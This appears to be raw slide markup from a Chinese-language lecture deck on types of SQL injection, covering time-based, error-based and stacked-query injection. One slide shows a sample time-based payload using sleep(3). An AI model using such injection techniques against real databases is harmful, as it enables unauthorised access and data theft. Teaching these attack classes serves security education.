                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A5A3423-4632-4B4E-815B-3EDCA27E38AB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5283976" flipH="1">
            <a:off x="851581" y="2756950"/>
            <a:ext cx="379412" cy="381000"/>
            <a:chOff x="3552" y="960"/>
            <a:chExt cx="215" cy="182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FA5EEC6-B242-C14A-B35F-5A14F89779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8" y="960"/>
              <a:ext cx="119" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 262"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 261 w 262"/>
                <a:gd name="T3" fmla="*/ 316 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 262"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 212 w 262"/>
                <a:gd name="T7" fmla="*/ 374 h 37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2"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 262 w 262"/>
                <a:gd name="T15" fmla="*/ 375 h 37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2" h="375">
                  <a:moveTo>
                    <a:pt x="212" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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20FEA43C-0851-7845-A28F-CDA60BF16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2" y="960"/>
              <a:ext cx="194" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 426"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 425 w 426"/>
                <a:gd name="T3" fmla="*/ 374 h 375"/>
                <a:gd name="T4" fmla="*/ 213 w 426"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 0 w 426"/>
                <a:gd name="T7" fmla="*/ 374 h 37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26"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 426 w 426"/>
                <a:gd name="T15" fmla="*/ 375 h 37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26" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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BC1F2FCD-59DC-7D47-8737-1397D074D2EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671508" y="2654439"/>
            <a:ext cx="7828597" cy="3280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select * from user where id= ‘4’ and sleep(3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0"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页面不会返回错误信息，不会输出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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注入所查出来的泄露的信息。类似搜索这类请求，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1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boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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注入也无能为力，因为搜索返回空也属于正常的，这时就得采用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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time-based</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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的注入了，即判断请求响应的时间，但该类型注入获取信息的速度比较慢，请求次数比较多，纯手工非常复杂。</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0"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3294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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="32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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1625611" y="1560515"/>
            <a:ext cx="6976641" cy="6624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Error-based</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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（报错型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill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C23BC1-A326-064A-92FE-C8B0FD431769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5283976" flipH="1">
            <a:off x="805684" y="2730646"/>
            <a:ext cx="379412" cy="381000"/>
            <a:chOff x="3552" y="960"/>
            <a:chExt cx="215" cy="182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FA5EEC6-B242-C14A-B35F-5A14F89779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8" y="960"/>
              <a:ext cx="119" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 262"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 261 w 262"/>
                <a:gd name="T3" fmla="*/ 316 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 262"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 212 w 262"/>
                <a:gd name="T7" fmla="*/ 374 h 37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2"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 262 w 262"/>
                <a:gd name="T15" fmla="*/ 375 h 37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2" h="375">
                  <a:moveTo>
                    <a:pt x="212" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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20FEA43C-0851-7845-A28F-CDA60BF16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2" y="960"/>
              <a:ext cx="194" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 426"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 425 w 426"/>
                <a:gd name="T3" fmla="*/ 374 h 375"/>
                <a:gd name="T4" fmla="*/ 213 w 426"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 0 w 426"/>
                <a:gd name="T7" fmla="*/ 374 h 37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26"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 426 w 426"/>
                <a:gd name="T15" fmla="*/ 375 h 37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26" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRP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C190DC1D-4B85-D14D-A0AA-8CA3798D8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625611" y="2641990"/>
            <a:ext cx="7828597" cy="1895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如果页面能够输出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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报错信息，则可以从报错信息中获得想要的信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0"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典型的就是利用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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group by</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en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duplicate entry</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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错误。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 131">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9FCCB5F-CDA5-8847-AAA3-982B6DD12515}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="798597" y="1734429"/>
            <a:ext cx="433767" cy="433767"/>
            <a:chOff x="1902319" y="1507871"/>
            <a:chExt cx="938512" cy="938512"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 132">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEA245E-4323-6847-8AA7-C4F2786A9D81}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2136408" y="1764045"/>
              <a:ext cx="470334" cy="426157"/>
              <a:chOff x="6448425" y="796925"/>
              <a:chExt cx="287338" cy="260350"/>
            </a:xfrm>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Freeform 3562">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{292230D1-828D-3D47-A8E7-F66E000648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8425" y="796925"/>
                <a:ext cx="277812" cy="161925"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 701"/>
                  <a:gd name="T1" fmla="*/ 285 h 408"/>
                  <a:gd name="T2" fmla="*/ 5 w 701"/>
                  <a:gd name="T3" fmla="*/ 288 h 408"/>
                  <a:gd name="T4" fmla="*/ 2 w 701"/>
                  <a:gd name="T5" fmla="*/ 290 h 408"/>
                  <a:gd name="T6" fmla="*/ 1 w 701"/>
                  <a:gd name="T7" fmla="*/ 293 h 408"/>
                  <a:gd name="T8" fmla="*/ 0 w 701"/>
                  <a:gd name="T9" fmla="*/ 297 h 408"/>
                  <a:gd name="T10" fmla="*/ 1 w 701"/>
                  <a:gd name="T11" fmla="*/ 300 h 408"/>
                  <a:gd name="T12" fmla="*/ 2 w 701"/>
                  <a:gd name="T13" fmla="*/ 303 h 408"/>
                  <a:gd name="T14" fmla="*/ 5 w 701"/>
                  <a:gd name="T15" fmla="*/ 306 h 408"/>
                  <a:gd name="T16" fmla="*/ 8 w 701"/>
                  <a:gd name="T17" fmla="*/ 308 h 408"/>
                  <a:gd name="T18" fmla="*/ 259 w 701"/>
                  <a:gd name="T19" fmla="*/ 408 h 408"/>
                  <a:gd name="T20" fmla="*/ 701 w 701"/>
                  <a:gd name="T21" fmla="*/ 0 h 408"/>
                  <a:gd name="T22" fmla="*/ 8 w 701"/>
                  <a:gd name="T23" fmla="*/ 285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01" h="408">
                    <a:moveTo>
                      <a:pt x="8" y="285"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="290"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="701" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="285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accent5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8" name="Freeform 3563">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DB96AD7-1849-F740-B101-31BF497E01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788" y="800100"/>
                <a:ext cx="180975" cy="257175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 456"/>
                  <a:gd name="T1" fmla="*/ 424 h 646"/>
                  <a:gd name="T2" fmla="*/ 0 w 456"/>
                  <a:gd name="T3" fmla="*/ 635 h 646"/>
                  <a:gd name="T4" fmla="*/ 0 w 456"/>
                  <a:gd name="T5" fmla="*/ 639 h 646"/>
                  <a:gd name="T6" fmla="*/ 3 w 456"/>
                  <a:gd name="T7" fmla="*/ 642 h 646"/>
                  <a:gd name="T8" fmla="*/ 5 w 456"/>
                  <a:gd name="T9" fmla="*/ 645 h 646"/>
                  <a:gd name="T10" fmla="*/ 9 w 456"/>
                  <a:gd name="T11" fmla="*/ 646 h 646"/>
                  <a:gd name="T12" fmla="*/ 11 w 456"/>
                  <a:gd name="T13" fmla="*/ 646 h 646"/>
                  <a:gd name="T14" fmla="*/ 12 w 456"/>
                  <a:gd name="T15" fmla="*/ 646 h 646"/>
                  <a:gd name="T16" fmla="*/ 16 w 456"/>
                  <a:gd name="T17" fmla="*/ 646 h 646"/>
                  <a:gd name="T18" fmla="*/ 18 w 456"/>
                  <a:gd name="T19" fmla="*/ 645 h 646"/>
                  <a:gd name="T20" fmla="*/ 21 w 456"/>
                  <a:gd name="T21" fmla="*/ 644 h 646"/>
                  <a:gd name="T22" fmla="*/ 22 w 456"/>
                  <a:gd name="T23" fmla="*/ 641 h 646"/>
                  <a:gd name="T24" fmla="*/ 126 w 456"/>
                  <a:gd name="T25" fmla="*/ 469 h 646"/>
                  <a:gd name="T26" fmla="*/ 315 w 456"/>
                  <a:gd name="T27" fmla="*/ 569 h 646"/>
                  <a:gd name="T28" fmla="*/ 317 w 456"/>
                  <a:gd name="T29" fmla="*/ 570 h 646"/>
                  <a:gd name="T30" fmla="*/ 320 w 456"/>
                  <a:gd name="T31" fmla="*/ 572 h 646"/>
                  <a:gd name="T32" fmla="*/ 323 w 456"/>
                  <a:gd name="T33" fmla="*/ 570 h 646"/>
                  <a:gd name="T34" fmla="*/ 325 w 456"/>
                  <a:gd name="T35" fmla="*/ 570 h 646"/>
                  <a:gd name="T36" fmla="*/ 329 w 456"/>
                  <a:gd name="T37" fmla="*/ 567 h 646"/>
                  <a:gd name="T38" fmla="*/ 332 w 456"/>
                  <a:gd name="T39" fmla="*/ 561 h 646"/>
                  <a:gd name="T40" fmla="*/ 456 w 456"/>
                  <a:gd name="T41" fmla="*/ 0 h 646"/>
                  <a:gd name="T42" fmla="*/ 0 w 456"/>
                  <a:gd name="T43" fmla="*/ 424 h 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56" h="646">
                    <a:moveTo>
                      <a:pt x="0" y="424"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="645"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="469"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="424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accent5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sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FECB531-EF8A-314E-8F26-C701E4951132}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1902319" y="1507871"/>
              <a:ext cx="938512" cy="938512"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1D49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9246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CED99-4025-2743-9E47-0910E9C34221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363415" y="306601"/>
            <a:ext cx="4796414" cy="55772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err="1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认识SQL注入的不同类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"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6068DB0-0E34-0648-8A70-B6AAAE455749}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-355600" y="1122363"/>
            <a:ext cx="12547600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150" cmpd="sng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1625611" y="1563149"/>
            <a:ext cx="6976641" cy="6624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Stacked queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999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rPr>
              <a:t>（多语句查询型注入）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
              <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122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8C23BC1-A326-064A-92FE-C8B0FD431769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="5283976" flipH="1">
            <a:off x="805684" y="2733280"/>
            <a:ext cx="379412" cy="381000"/>
            <a:chOff x="3552" y="960"/>
            <a:chExt cx="215" cy="182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FA5EEC6-B242-C14A-B35F-5A14F89779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8" y="960"/>
              <a:ext cx="119" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 212 w 262"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 261 w 262"/>
                <a:gd name="T3" fmla="*/ 316 h 375"/>
                <a:gd name="T4" fmla="*/ 0 w 262"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 212 w 262"/>
                <a:gd name="T7" fmla="*/ 374 h 37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2"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 262 w 262"/>
                <a:gd name="T15" fmla="*/ 375 h 37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2" h="375">
                  <a:moveTo>
                    <a:pt x="212" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="261" y="316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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20FEA43C-0851-7845-A28F-CDA60BF16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2" y="960"/>
              <a:ext cx="194" cy="182"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 426"/>
                <a:gd name="T1" fmla="*/ 374 h 375"/>
                <a:gd name="T2" fmla="*/ 425 w 426"/>
                <a:gd name="T3" fmla="*/ 374 h 375"/>
                <a:gd name="T4" fmla="*/ 213 w 426"/>
                <a:gd name="T5" fmla="*/ 0 h 375"/>
                <a:gd name="T6" fmla="*/ 0 w 426"/>
                <a:gd name="T7" fmla="*/ 374 h 37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26"/>
                <a:gd name="T13" fmla="*/ 0 h 375"/>
                <a:gd name="T14" fmla="*/ 426 w 426"/>
                <a:gd name="T15" fmla="*/ 375 h 37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26" h="375">
                  <a:moveTo>
                    <a:pt x="0" y="374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425" y="374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="0">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="764700"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FF9900"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="12700" cap="rnd">
              <a:solidFill>
                <a:srgbClr val="F2BF5A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latin typeface="Calibri" pitchFamily="34" charset="0"/>
